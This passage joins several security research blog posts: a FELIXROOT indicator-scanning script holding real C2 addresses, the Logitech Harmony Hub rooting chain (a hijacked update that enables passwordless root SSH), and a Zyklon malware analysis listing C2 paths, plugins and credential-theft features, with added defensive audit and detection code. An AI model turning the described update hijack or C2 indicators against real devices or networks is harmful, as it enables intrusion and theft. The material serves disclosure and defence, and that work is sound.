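                    "193.23.181.151/Seminar.rtf"]
# Two of the hard-coded User-Agent strings listed in the appendix.
KNOWN_UAS = {
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
    "Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)",
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
    "Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)",
}
DEFAULT_PORTS = {"http": 80, "https": 443}


def parse_config(blob):
    cfg = json.loads(blob)
    return {"c2_urls": [cfg[k] for k in ("1", "7") if k in cfg],
            "campaign_id": cfg.get("4")}


def normalise(url):
    """(host, port, path) for a full URL or a bare host[:port]/path indicator.
    A bare indicator without a port yields port None, meaning 'any port'."""
    bare = "://" not in url
    parts = urlsplit("http://" + url if bare else url)
    port = parts.port
    if port is None and not bare:
        port = DEFAULT_PORTS.get(parts.scheme.lower())
    return parts.hostname, port, parts.path or "/"


def build_indicators(blobs=CONFIG_BLOBS, extra=EXTRA_INDICATORS):
    urls = [u for b in blobs for u in parse_config(b)["c2_urls"]] + list(extra)
    return {normalise(u) for u in urls}


def _is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(method, url, user_agent, indicators):
    host, port, path = normalise(url)
    for ind_host, ind_port, ind_path in indicators:
        if host == ind_host and ind_port in (None, port) and path.startswith(ind_path):
            return "c2-or-staging-url"      # strong: exact indicator match
    if method == "POST" and user_agent in KNOWN_UAS and _is_bare_ip(host):
        return "suspect-post"               # weak: hard-coded IE UA, POST to a bare IP
    return None


def scan(log_text, indicators=None):
    """Assumed log format: timestamp, client IP, method, URL, User-Agent, tab-separated."""
    indicators = indicators or build_indicators()
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        _ts, client, method, url, ua = line.split("\t", 4)
        verdict = classify(method, url, ua, indicators)
        if verdict:
            hits.append((lineno, client, verdict))
    return hits


UA_IE7, UA_IE8 = sorted(KNOWN_UAS)   # "MSIE 7.0" sorts before "MSIE 8.0"
# Constructed sample log, not real traffic.
SAMPLE_LOG = "\n".join("\t".join(row) for row in [
    ("2018-07-12T10:01:02Z", "10.0.0.15", "POST", "http://217.12.204.100/news/", UA_IE7),
    ("2018-07-12T10:01:05Z", "10.0.0.15", "GET", "http://193.23.181.151/Seminar.rtf", "Microsoft Office/16.0"),
    ("2018-07-12T10:02:10Z", "10.0.0.22", "GET", "https://www.example.com/index.html", "Mozilla/5.0 Firefox/61.0"),
    ("2018-07-12T10:03:44Z", "10.0.0.31", "POST", "https://88.198.13.116:8443/xmlservice", UA_IE8),
    ("2018-07-12T10:04:01Z", "10.0.0.40", "POST", "http://198.51.100.7/upload", UA_IE7),
])

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Matching on the appendix indicators is the reliable part; the User-Agent heuristic is only there because the post notes the header values are hard-coded in the sample, and a hard-coded IE7 string on a host whose real browser is something else is a useful inconsistency to chase, not a conviction on its own.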
FireEye Detections

MD5                                 Product     Signature                        Action
11227ECA89CC053FB189FAC3EBF27497    NX/EX/AX    Malware.Binary.rtf               Block
4DE5ADB865B5198B4F2593AD436FCEFF    NX/EX/AX    Malware.Binary.rtf               Block
78734CD268E5C9AB4184E1BBE21A6EB9    NX/EX/AX    Malware.Binary                   Block
92F63B1227A6B37335495F9BCB939EA2    NX/EX/AX    FE_Dropper_Win32_FELIXROOT_1     Block
DE10A32129650849CEAF4009E660F72F    NX/EX/AX    FE_Backdoor_Win32_FELIXROOT_2    Block
11227ECA89CC053FB189FAC3EBF27497    HX          IOC                              Alert
4DE5ADB865B5198B4F2593AD436FCEFF    HX          IOC                              Alert

Table 5: FireEye Detections

Acknowledgements

Special thanks to Jonell Baltazar, Alex Berry and Benjamin Read for their contributions to this blog.

Rooting a Logitech Harmony Hub: Improving Security in Today’s IoT World

Introduction

FireEye’s Mandiant Red Team recently discovered vulnerabilities in the Logitech Harmony Hub Internet of Things (IoT) device that can be chained to obtain root access to the device over SSH. The Harmony Hub is a home control system designed to connect to and control a variety of devices in the user’s home. Exploiting these vulnerabilities from the local network would allow an attacker to control the devices linked to the Hub and to use the Hub as a foothold from which to attack other devices on the local network. Because the Harmony Hub supports devices such as smart locks and smart thermostats alongside other smart home devices, these vulnerabilities present a very high risk to users.

FireEye disclosed these vulnerabilities to Logitech in January 2018. Logitech was receptive and has coordinated with FireEye to release this blog post in conjunction with a firmware update (4.15.96) to address these findings.

The Red Team discovered the following vulnerabilities:

  • Improper certificate validation
  • Insecure update process
  • Developer debugging symbols left in the production firmware image
  • Blank root user password

The Red Team used a combination of the vulnerabilities to gain administrative access to the Harmony Hub. This blog post outlines the discovery and analysis process, and demonstrates the necessity of rigorous security testing of consumer devices – particularly as the public places an increasing amount of trust in devices that are not just connected to home networks, but also give access to many details about the daily lives of their users.

Device Analysis

Device Preparation

Publicly available research indicated the presence of a universal asynchronous receiver/transmitter (UART) interface on some of the test points on the Harmony Hub. We soldered jumper wires to the test pads, which allowed us to connect to the Harmony Hub using a TTL to USB serial cable. Initial analysis of the boot process showed that the Harmony Hub booted via U-Boot 1.1.4 and ran a Linux kernel (Figure 1).


Figure 1: Initial boot log output from UART interface

After this point in the boot process, the console stopped returning output because the kernel was not configured with any console interfaces. We reconfigured the kernel boot parameters in U-Boot to inspect the full boot process, but no useful information was recovered. Furthermore, because the UART interface was configured to only transmit, no further interaction could be performed with the Harmony Hub on this interface. Therefore, we shifted our focus to gaining a better understanding of the Linux operating system and associated software running on the Harmony Hub.

Firmware Recovery and Extraction

The Harmony Hub is designed to pair with a companion Android or iOS application over Bluetooth for its initial configuration. We created a wireless network with hostapd and installed a Burp Suite Pro CA certificate on a test Android device to intercept traffic sent by the Harmony mobile application to the Internet and to the Harmony Hub. Once initial pairing is complete, the Harmony application searches for Harmony Hubs on the local network and communicates with the Harmony Hub over an HTTP-based API.

Once connected, the Harmony application sends two different requests to Harmony Hub’s API, which cause the Harmony Hub to check for updates (Figure 2).


Figure 2: A query to force the Harmony Hub to check for updates

The Harmony Hub sends its current firmware version to a Logitech server to determine if an update is available (Figure 3). If an update is available, the Logitech server sends a response containing a URL for the new firmware version (Figure 4). Despite using a self-signed certificate to intercept the HTTPS traffic sent by the Harmony Hub, we were able to observe this process – demonstrating that the Harmony Hub ignores invalid SSL certificates.


Figure 3: The Harmony Hub checks for updates to its firmware


Figure 4: The server sends a response with a URL for the updated firmware

We retrieved this firmware and examined the file. After extracting a few layers of archives, the firmware can be found in the harmony-image.squashfs file. This filesystem image is a SquashFS filesystem compressed with LZMA, a common format for embedded devices. However, vendors often build their images with old versions of squashfs-tools that are incompatible with more recent squashfs-tools builds. We used the unsquashfs_all.sh script included in firmware-mod-kit to automate the process of finding the correct version of unsquashfs to extract the filesystem image (Figure 5).


Figure 5: Using firmware-mod-kit to extract the filesystem

With the filesystem contents extracted, we investigated some of the configuration details of the Harmony Hub’s operating system. Inspection revealed that various debug details were available in the production image, such as kernel modules that were not stripped (Figure 6).


Figure 6: Unstripped Linux kernel objects on the filesystem

Investigation of /etc/passwd showed that the root user had no password configured (Figure 7). Therefore, if we can enable the dropbear SSH server, we can gain root access to the Harmony Hub through SSH without a password.


Figure 7: /etc/passwd shows no password is configured for the root user

We observed that an instance of a dropbear SSH server will be enabled during initialization if the file /etc/tdeenable is present in the filesystem (Figure 8).


Figure 8: A dropbear SSH server is enabled by /etc/init.d/rcS script if /etc/tdeenable is present
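The three findings above (a root account with no password, a debug flag file that switches on dropbear at boot, and unstripped kernel objects) are all things that can be checked mechanically once a firmware image has been unpacked. The following is an added example, not FireEye's tooling or anything from the Harmony Hub firmware: it audits an extracted root filesystem for exactly those conditions. The /etc/tdeenable path and the dropbear gate in /etc/init.d/rcS are taken from the write-up; the sample rootfs it builds in a temporary directory is constructed, and the .symtab test for unstripped modules is a heuristic.

```python
"""Audit an extracted embedded-Linux root filesystem for the weaknesses the
Harmony Hub write-up found: accounts with no password, a flag file whose
presence turns on an SSH daemon at boot, and unstripped kernel objects.

Added example, not FireEye's tooling. A sample rootfs is constructed in a
temporary directory; /etc/tdeenable and the dropbear gate in /etc/init.d/rcS
come from the write-up, every other file content here is made up."""
import re
import tempfile
from pathlib import Path
from typing import Dict, List


def passwordless_accounts(rootfs: Path) -> List[str]:
    """Users whose effective password field is empty. An empty second field
    in /etc/passwd is no password at all; 'x' defers to /etc/shadow, where an
    empty field means the same. Locked markers ('*', '!') are not empty."""
    shadow: Dict[str, str] = {}
    shadow_file = rootfs / "etc/shadow"
    if shadow_file.exists():
        for line in shadow_file.read_text().splitlines():
            fields = line.split(":")
            if len(fields) >= 2:
                shadow[fields[0]] = fields[1]
    found = []
    for line in (rootfs / "etc/passwd").read_text().splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue                      # not a well-formed passwd entry
        user, pw = fields[0], fields[1]
        if pw == "x":
            pw = shadow.get(user, "!")    # missing from shadow: treat as locked
        if pw == "":
            found.append(user)
    return found


def present_flag_files(rootfs: Path, flags=("etc/tdeenable",)) -> List[str]:
    """Files whose mere presence changes boot behaviour."""
    return [f for f in flags if (rootfs / f).exists()]


def ssh_gates_in_init(rootfs: Path) -> List[str]:
    """Init-script lines that start dropbear/sshd behind a file test,
    e.g. '[ -f /etc/tdeenable ] && dropbear'."""
    gate = re.compile(r"\[\s+-[ef]\s+\S+\s+\].*\b(dropbear|sshd)\b")
    initd = rootfs / "etc/init.d"
    if not initd.is_dir():
        return []
    return [f"{s.name}: {line.strip()}" for s in sorted(initd.iterdir()) if s.is_file()
            for line in s.read_text(errors="replace").splitlines()
            if gate.search(line)]


def unstripped_kernel_objects(rootfs: Path) -> List[str]:
    """Heuristic: an ELF .ko whose section-name table still lists .symtab
    has not been stripped (strip removes .symtab and .strtab)."""
    hits = []
    for ko in sorted(rootfs.rglob("*.ko")):
        data = ko.read_bytes()
        if data[:4] == b"\x7fELF" and b".symtab\0" in data:
            hits.append(ko.relative_to(rootfs).as_posix())
    return hits


def audit(rootfs: Path) -> Dict[str, List[str]]:
    return {"passwordless": passwordless_accounts(rootfs),
            "flag_files": present_flag_files(rootfs),
            "ssh_gates": ssh_gates_in_init(rootfs),
            "unstripped_ko": unstripped_kernel_objects(rootfs)}


def build_sample_rootfs(root: Path) -> None:
    """Constructed rootfs mirroring the write-up's findings."""
    (root / "etc/init.d").mkdir(parents=True)
    (root / "lib/modules").mkdir(parents=True)
    (root / "etc/passwd").write_text(
        "root::0:0:root:/root:/bin/sh\n"            # empty field: no password
        "daemon:x:1:1:daemon:/usr/sbin:/bin/false\n"
        "svc:x:100:100::/:/bin/false\n")
    (root / "etc/shadow").write_text(
        "daemon:*:17000:0:99999:7:::\n"            # locked
        "svc::17000:0:99999:7:::\n")               # empty: no password
    (root / "etc/init.d/rcS").write_text(
        "#!/bin/sh\n[ -f /etc/tdeenable ] && /usr/sbin/dropbear -p 22\n")
    (root / "etc/tdeenable").touch()
    (root / "lib/modules/debug.ko").write_bytes(
        b"\x7fELF" + b"\0" * 12 + b".shstrtab\0.symtab\0.strtab\0")
    (root / "lib/modules/stripped.ko").write_bytes(
        b"\x7fELF" + b"\0" * 12 + b".shstrtab\0.text\0")


def demo() -> Dict[str, List[str]]:
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_rootfs(Path(tmp))
        return audit(Path(tmp))


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Point `audit()` at the directory unsquashfs produced and every hit is a release-blocking finding: an empty password field is root access the moment any shell is reachable, a boot-time flag file is a latent backdoor switch, and symbols in production kernel objects hand an attacker the map the Red Team had to reconstruct here.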

Hijacking Update Process

During the initialization process, the Harmony Hub queries the GetJson2Uris endpoint on the Logitech API to obtain a list of URLs to use for various processes (Figure 9), such as the URL to use when checking for updated firmware or the URL to obtain information about updates to additional software packages.


Figure 9: The request to obtain a list of URL endpoints for various processes

We intercepted and modified the JSON object in the response from the server to point the GetUpdates member to our own IP address, as shown in Figure 10.


Figure 10: The modified JSON object member

Similar to the firmware update process, the Harmony Hub sends a POST request to the endpoint specified by GetUpdates containing the current versions of its internal software packages. The request shown in Figure 11 contains a sample request for the HEOS package.


Figure 11: The JSON request object containing the current version of the “HEOS” package

If the sysBuild parameter in the POST request body does not match the current version known by the server, the server responds with an initial response containing information about the new package version. For an undetermined reason, the Harmony Hub ignores this initial response and sends a second request. The second response contains multiple URLs pointing to the updated package, as shown in Figure 12.


Figure 12: The JSON response containing URLs for the software update

We downloaded and inspected the .pkg files listed in the response object, which are actually just ZIP archives. The archives contain a simple file hierarchy, as shown in Figure 13.


Figure 13: The .pkg archive file hierarchy

The manifest.json file contains information used to instruct the Harmony Hub’s update process on how to handle the archive’s contents (Figure 14).


Figure 14: The contents of the manifest.json file

The Harmony Hub’s update process executes the script provided by the installer parameter of the manifest if it is present within the archive. We modified this script, as shown in Figure 15, to create the /etc/tdeenable file, which causes the boot process to enable the SSH interface as previously described.


Figure 15: The modified update.sh file

We created a new malicious archive with the appropriate .pkg extension and hosted it on a local web server. The next time the Harmony Hub checked for updates against the URL supplied in the modified GetJson2Uris response, we sent a modified response pointing to this update. The Harmony Hub retrieved our malicious update package, and after the Harmony Hub rebooted, the SSH interface was enabled. This allowed us to access the device with the username root and a blank password, as shown in Figure 16.


Figure 16: The SSH interface was enabled after a reboot
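The update hijack works because the Hub accepts any TLS certificate, then unpacks a .pkg archive and runs whatever script manifest.json names, with nothing tying the archive to the vendor. The following is an added example, not Logitech's update code: it shows the checks an update client should perform on such an archive before a single file is written or executed. The names manifest.json, the installer key and update.sh come from the write-up; the archive is constructed in memory, and the expected SHA-256 stands in for an authenticated value (in a real design, a signature over the archive) that the vendor delivers separately from the archive itself.

```python
"""Verify a vendor '.pkg' update archive (a ZIP carrying manifest.json and
an installer script, as the Harmony Hub package does) before any of it is
written to disk or executed.

Added example, not Logitech's update code. The archive is constructed in
memory; 'manifest.json', the 'installer' key and 'update.sh' come from the
write-up. The expected digest stands in for whatever authenticated value
(ideally a signature) the vendor would deliver separately from the archive."""
import hashlib
import hmac
import io
import json
import zipfile
from typing import Dict, Tuple


class UpdateRejected(Exception):
    """Raised before anything from the archive is used."""


def _safe_member(name: str) -> bool:
    """Reject absolute paths, drive letters and '..' segments (zip-slip)."""
    parts = name.replace("\\", "/").split("/")
    if name.startswith(("/", "\\")) or ":" in parts[0]:
        return False
    return ".." not in parts


def verify_update_package(pkg: bytes, expected_sha256: str) -> Dict:
    """Return the parsed manifest only if every check passes."""
    # 1. Integrity against an out-of-band digest, compared in constant time.
    digest = hashlib.sha256(pkg).hexdigest()
    if not hmac.compare_digest(digest, expected_sha256.lower()):
        raise UpdateRejected("digest mismatch")
    # 2. Well-formed ZIP with only safe member paths.
    try:
        zf = zipfile.ZipFile(io.BytesIO(pkg))
    except zipfile.BadZipFile as exc:
        raise UpdateRejected(f"not a ZIP archive: {exc}") from exc
    names = zf.namelist()
    unsafe = [n for n in names if not _safe_member(n)]
    if unsafe:
        raise UpdateRejected(f"unsafe member paths: {unsafe}")
    # 3. Manifest present and parseable; any installer must live in the archive.
    if "manifest.json" not in names:
        raise UpdateRejected("manifest.json missing")
    try:
        manifest = json.loads(zf.read("manifest.json"))
    except ValueError as exc:
        raise UpdateRejected(f"manifest is not valid JSON: {exc}") from exc
    installer = manifest.get("installer")
    if installer is not None and (not isinstance(installer, str) or installer not in names):
        raise UpdateRejected(f"installer {installer!r} is not a member of the archive")
    return manifest


def check(pkg: bytes, expected_sha256: str) -> Tuple[bool, str]:
    """Convenience wrapper: (accepted, rejection reason or installer name)."""
    try:
        manifest = verify_update_package(pkg, expected_sha256)
    except UpdateRejected as exc:
        return False, str(exc)
    return True, manifest.get("installer", "")


def build_package(members: Dict[str, bytes]) -> bytes:
    """Construct a .pkg-style ZIP in memory (test fixture only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample package: a manifest pointing at update.sh.
GOOD_PKG = build_package({
    "manifest.json": json.dumps({"version": "0.0.1", "installer": "update.sh"}).encode(),
    "update.sh": b"#!/bin/sh\necho 'constructed installer'\n",
})
GOOD_DIGEST = hashlib.sha256(GOOD_PKG).hexdigest()   # the value the vendor publishes

# Same manifest, installer script altered in transit: digest no longer matches.
TAMPERED_PKG = build_package({
    "manifest.json": json.dumps({"version": "0.0.1", "installer": "update.sh"}).encode(),
    "update.sh": b"#!/bin/sh\necho 'modified'\n",
})

# Zip-slip: a member that escapes the extraction directory.
SLIP_PKG = build_package({"manifest.json": b"{}", "../../etc/tdeenable": b""})


def demo() -> Dict[str, Tuple[bool, str]]:
    return {"good": check(GOOD_PKG, GOOD_DIGEST),
            "tampered": check(TAMPERED_PKG, GOOD_DIGEST),
            "slip": check(SLIP_PKG, hashlib.sha256(SLIP_PKG).hexdigest())}
```

The order matters: integrity is checked on the raw bytes before the ZIP parser ever sees them, and member paths are checked before anything is extracted, so a tampered or hostile archive is discarded without side effects. With the Hub's actual behaviour (no certificate validation, no archive authentication), the digest check is the one step that would have stopped the hijack described above.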

Conclusion

As technology becomes further embedded into our daily lives, the trust we place in various devices unknowingly increases exponentially. Because the Harmony Hub, like many IoT devices, uses a common processor architecture, malicious tools could easily be added to a compromised Harmony Hub, increasing the overall impact of a targeted attack. However, Logitech worked with our team to quickly address the vulnerabilities with their current firmware, 4.15.96. Developers of the devices in which we place our trust should be vigilant in removing potential attack vectors that could expose end users to security risks. We also want to share Logitech’s statement on the research and work by the Red Team:

"At Logitech, we take our customers’ security and privacy very seriously. In late January 2018, security research firm FireEye pointed out vulnerabilities that could impact Logitech Harmony Hub-based products*.

If a malicious hacker had already gained access to a Hub user’s network, these vulnerabilities could be exploited. We appreciate the work that professional security research firms like FireEye provide when identifying these types of vulnerabilities on IoT devices.

As soon as FireEye shared their research findings with us, we reviewed internally and immediately started to develop firmware to address it. As of April 10, we have released firmware that addresses all of the vulnerabilities that were identified. For any customers who haven’t yet updated to firmware version 4.15.96, we recommend you check the MyHarmony software and sync your Hub-based remote and receive it. Complete directions on updating your firmware can be found here.

*Hub-based products include: Harmony Elite, Harmony Home Hub, Harmony Ultimate Hub, Harmony Hub, Harmony Home Control, Harmony Pro, Harmony Smart Control, Harmony Companion, Harmony Smart Keyboard, Harmony Ultimate and Ultimate Home."

Microsoft Office Vulnerabilities Used to Distribute Zyklon Malware in Recent Campaign

Introduction

FireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware. Zyklon has been observed in the wild since early 2016 and provides myriad sophisticated capabilities.

Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.

Infection Vector

We have observed this recent wave of Zyklon malware being delivered primarily through spam emails. The email typically arrives with an attached ZIP file containing a malicious DOC file (Figure 1 shows a sample lure).

The following industries have been the primary targets in this campaign:

  • Telecommunications
  • Insurance
  • Financial Services


Figure 1: Sample lure documents

Attack Flow

  1. Spam email arrives in the victim’s mailbox as a ZIP attachment, which contains a malicious DOC file.
  2. The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell-based payload takes over.
  3. The PowerShell script is responsible for downloading the final payload from the C2 server and executing it.

A visual representation of the attack flow and execution chain can be seen in Figure 2.


Figure 2: Zyklon attack flow

Infection Techniques

CVE-2017-8759

This vulnerability was discovered by FireEye in September 2017, and it is a vulnerability we have observed being exploited in the wild.

The DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3).


Figure 3: Embedded URL in OLE object

CVE-2017-11882

Similarly, we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office. Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4).


Figure 4: Embedded URL in OLE object


Figure 5: HTTP GET request to download the next level payload

The downloaded file, doc.doc, is XML-based and contains a PowerShell command (shown in Figure 6) that subsequently downloads the binary Pause.ps1.


Figure 6: PowerShell command to download the Pause.ps1 payload

Dynamic Data Exchange (DDE)

Dynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution. With the help of a PowerShell script (shown in Figure 7), the next payload (Pause.ps1) is downloaded.


Figure 7: DDE technique used to download the Pause.ps1 payload

One of the unique approaches we have observed is the use of dot-less IP addresses (example: hxxp://258476380).

Figure 8 shows the network communication of the Pause.ps1 download.


Figure 8: Network communication to download the Pause.ps1 payload

Zyklon Delivery

In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded (as seen in Figure 8).

The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode. The APIs contain VirtualAlloc(), memset(), and CreateThread(). Figure 9 shows the decoded Base64 code.


Figure 9: Base64 decoded Pause.ps1

The injected code is responsible for downloading the final payload from the server (see Figure 10). The final stage payload is a PE executable compiled with .Net framework.


Figure 10: Network traffic to download final payload (words.exe)

Once executed, the file performs the following activities:

  1. Drops a copy of itself in %AppData%\svchost.exe\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11).
  2. Unpacks the code in memory via process hollowing. The MSIL file contains the packed core payload in its .Net resource section.
  3. The unpacked code is Zyklon.


Figure 11: XML configuration file to schedule the task
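The persistence step above leaves two artifacts a host sensor can key on: an executable named svchost.exe living under %AppData% rather than System32, and a scheduled task registered from an XML definition by that process. The following is an added example, not FireEye's "SUSPICIOUS SVCHOST.EXE" logic: it applies those two rules to constructed Sysmon-style process-creation records. The %AppData%\svchost.exe\svchost.exe path and the words.exe file name come from the analysis; the user name, task name and task.xml path are made up.

```python
"""Host-based check for the persistence step above: a process named
svchost.exe whose image is not in the Windows system directories, or that
is not a child of services.exe, and a scheduled task registered from an XML
file by a process outside those directories.

Added example, not FireEye's 'SUSPICIOUS SVCHOST.EXE' logic. Events are
constructed Sysmon-style process-creation records; the AppData path is the
one named in the analysis, the task name and XML path are invented."""
import ntpath
from typing import Dict, List, Tuple

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def _norm(path: str) -> str:
    return ntpath.normpath(path).lower()


def svchost_findings(ev: Dict[str, str]) -> List[str]:
    """Reasons this event is suspicious; an empty list means nothing found."""
    image = _norm(ev.get("Image", ""))
    parent = _norm(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "").lower()
    reasons = []
    if ntpath.basename(image) == "svchost.exe":
        if ntpath.dirname(image) not in SYSTEM_DIRS:
            reasons.append(f"svchost.exe outside system dirs: {image}")
        if ntpath.basename(parent) != "services.exe":
            reasons.append(f"svchost.exe not spawned by services.exe (parent {parent})")
    # Task registration from an XML definition by a non-system parent.
    if (ntpath.basename(image) == "schtasks.exe" and "/create" in cmd
            and "/xml" in cmd and ntpath.dirname(parent) not in SYSTEM_DIRS):
        reasons.append(f"schtasks /create /xml launched by {parent}")
    return reasons


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    out = []
    for ev in events:
        reasons = svchost_findings(ev)
        if reasons:
            out.append((ev["Image"], reasons))
    return out


# Constructed events (field names follow Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe",                       # legitimate
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"Image": r"C:\Users\alice\AppData\Roaming\svchost.exe\svchost.exe",  # dropped copy
     "ParentImage": r"C:\Users\alice\Downloads\words.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Roaming\svchost.exe\svchost.exe"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",                      # task from XML
     "ParentImage": r"C:\Users\alice\AppData\Roaming\svchost.exe\svchost.exe",
     "CommandLine": r'schtasks.exe /create /tn "Updater" /xml "C:\Users\alice\AppData\Roaming\task.xml"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",                      # admin query
     "ParentImage": r"C:\Windows\System32\mmc.exe",
     "CommandLine": "schtasks.exe /query"},
]


def demo() -> List[Tuple[str, List[str]]]:
    return triage(SAMPLE_EVENTS)
```

The svchost path rule is close to zero false positives on a healthy host; the schtasks rule fires on any non-system parent and is meant as a lead to be tuned (installers and admin scripts also register tasks from XML), which is why each event returns its reasons rather than a single bit.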

The Zyklon malware first retrieves the external IP address of the infected machine using the following:

  • api.ipify[.]org
  • ip.anysrc[.]net
  • myexternalip[.]com
  • whatsmyip[.]com

The Zyklon executable contains another encrypted file in its .Net resource section named tor. This file is decrypted and injected into an instance of InstallUtil.exe, and functions as a Tor anonymizer.

Command & Control Communication

The C2 communication of Zyklon is proxied through the Tor network. The malware sends a POST request to the C2 server. The C2 address is appended with gate.php, a string stored in the malware’s memory. The parameter passed in this request is getkey=y. In response, the C2 server returns a Base64-encoded RSA public key (seen in Figure 12).


Figure 12: Zyklon public RSA key

After the connection is established with the C2 server, the malware can communicate with its control server using the commands shown in Table 1.

Command     Action
sign        Requests system information
settings    Requests settings from C2 server
logs        Uploads harvested passwords
wallet      Uploads harvested cryptocurrency wallet data
proxy       Indicates SOCKS proxy port opened
miner       Cryptocurrency miner commands
error       Reports errors to C2 server
ddos        DDoS attack commands

Table 1: Zyklon accepted commands

The following figures show the initial request and subsequent server response for the “settings” (Figure 13), “sign” (Figure 14), and “ddos” (Figure 15) commands.


Figure 13: Zyklon issuing “settings” command and subsequent server response


Figure 14: Zyklon issuing “sign” command and subsequent server response


Figure 15: Zyklon issuing “ddos” command and subsequent server response

Plugin Manager

Zyklon downloads a number of plugins from its C2 server. The plugin URL is stored in the file in the following format:

  • /plugin/index.php?plugin=<Plugin_Name>

The following plugins are found in the memory of the Zyklon malware:

  • /plugin/index.php?plugin=cuda
  • /plugin/index.php?plugin=minerd
  • /plugin/index.php?plugin=sgminer
  • /plugin/index.php?plugin=socks
  • /plugin/index.php?plugin=tor
  • /plugin/index.php?plugin=games
  • /plugin/index.php?plugin=software
  • /plugin/index.php?plugin=ftp
  • /plugin/index.php?plugin=email
  • /plugin/index.php?plugin=browser

The downloaded plugins are injected into: Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe.

Additional Features

The Zyklon malware offers the following additional capabilities (via plugins):

Browser Password Recovery

Zyklon HTTP can recover passwords from popular web browsers, including:

  • Google Chrome
  • Mozilla Firefox
  • Internet Explorer
  • Opera Browser
  • Chrome Canary/SXS
  • CoolNovo Browser
  • Apple Safari
  • Flock Browser
  • SeaMonkey Browser
  • SRWare Iron Browser
  • Comodo Dragon Browser

FTP Password Recovery

Zyklon currently supports FTP password recovery from the following FTP applications:

  • FileZilla
  • SmartFTP
  • FlashFXP
  • FTPCommander
  • Dreamweaver
  • WS_FTP

Gaming Software Key Recovery

Zyklon can recover PC Gaming software keys from the following games:

  • Battlefield
  • Call of Duty
  • FIFA
  • NFS
  • Age of Empires
  • Quake
  • The Sims
  • Half-Life
  • IGI
  • Star Wars

Email Password Recovery

Zyklon may also collect email passwords from following applications:

  • Microsoft Outlook Express
  • Microsoft Outlook 2002/XP/2003/2007/2010/2013
  • Mozilla Thunderbird
  • Windows Live Mail 2012
  • IncrediMail, Foxmail v6.x - v7.x
  • Windows Live Messenger
  • MSN Messenger
  • Google Talk
  • GMail Notifier
  • PaltalkScene IM
  • Pidgin (Formerly Gaim) Messenger
  • Miranda Messenger
  • Windows Credential Manager

License Key Recovery

The malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero.

Socks5 Proxy

Zyklon features the ability to establish a reverse Socks5 proxy server on infected host machines.

Hijack Clipboard Bitcoin Address

Zyklon has the ability to hijack the clipboard, and replaces the user’s copied bitcoin address with an address served up by the actor’s control server.

Zyklon Pricing

Researchers identified different versions of Zyklon HTTP being advertised in a popular underground marketplace for the following prices:

  • Normal build: $75 (USD)
  • Tor-enabled build: $125 (USD)
  • Rebuild/Updates: $15 (USD)
  • Payment Method: Bitcoin (BTC)

Conclusion

Threat actors incorporating recently discovered vulnerabilities in popular software – Microsoft Office, in this case – only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.

At the time of writing, the FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat. Table 2 lists the current detection and blocking capabilities by product.

Detection Name                               Product      Action
POWERSHELL DOWNLOADER D (METHODOLOGY)        HX           Detect
SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)    HX           Detect
POWERSHELL DOWNLOADER (METHODOLOGY)          HX           Detect
SUSPICIOUS EQNEDT USAGE (METHODOLOGY)        HX           Detect
TOR (TUNNELER)                               HX           Detect
SUSPICIOUS SVCHOST.EXE (METHODOLOGY)         HX           Detect
Malware.Binary.rtf                           EX/ETP/NX    Block
Malware.Binary                               EX/ETP/NX    Block
FE_Exploit_RTF_CVE_2017_8759                 EX/ETP/NX    Block
FE_Exploit_RTF_CVE201711882_1                EX/ETP/NX    Block

Table 2: Current detection capabilities by FireEye products

Indicators of Compromise

The analysis above is based on the representative sample lures shown in Table 3.

MD5                                 Name
